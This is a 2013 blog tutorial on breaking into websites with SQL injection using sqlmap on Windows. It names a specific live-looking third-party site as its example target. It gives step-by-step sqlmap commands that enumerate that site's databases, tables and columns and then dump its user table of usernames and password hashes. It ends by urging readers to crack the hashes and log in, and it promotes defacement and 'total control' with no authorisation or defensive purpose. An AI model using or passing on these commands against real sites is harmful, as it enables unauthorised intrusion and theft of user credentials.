Saturday, August 17, 2013

HOW TO HACK A WEBSITE USING "SQLMAP" ON WINDOWS


In this tutorial, we will learn how to Find a vulnerable Link in a website, Exploit that link by SQL Injection and taking total control over any website,This includes access to usernames and passwords database, defacing it, address forwarding and much more.This is the most powerful attack against any website and can create a word-wide mess if done for evil purposes.

So What are we waiting for ? Lets Begin ...



Step 1 :

======

Find A Sql injectable website to hacking...

Simply put (') after the site and if u got any syntex error so the site is vulnerable...

I found a site to give u an example of the tool very clearly...

http://www.areyoureadytoorder.co.uk/review.php?id=280'

The site is vulnerable so let's hack it...




Step 2 :

======


In this tutorial i will use windows so put this command in cmd...

Start Sqlmap and type this command into it....

I made a directory in the python folder named as sqlmap so this is....

+++++++++
command 1:
+++++++++        


                    python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --dbs



here -u = means the link of your sql injectable webste....
     
       --dbs = means tell the programme that dump the database...


Step 3 : 
=====

So after Getting the Database name to dump the tables type this command on the box...

++++++++
command 2 :
++++++++


                 python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --tables -D aytro






Step 4 : 
=====

Now you wanna the columns that database have so let's go to dump the columns.....

+++++++++
command 3 :
+++++++++

                  python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user




Step 5 : 
=====

So now you have tables and  columns of the website database....now the time to dump the username and password from the website....


Put the command to get the username and password....

+++++++++
command 4 :
+++++++++

                     python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user --dump




SO HERE IS THE USERNAME AND PASSCODES TO ACCESS BUT THE PASS IN HASH U NEED TO CRACK THEM SO AFTER THAT U GONE A ACCESS ON THE SITE,,,



HOPE U GUYS ENJOY THE TUTORIAL...

0 comments:

Post a Comment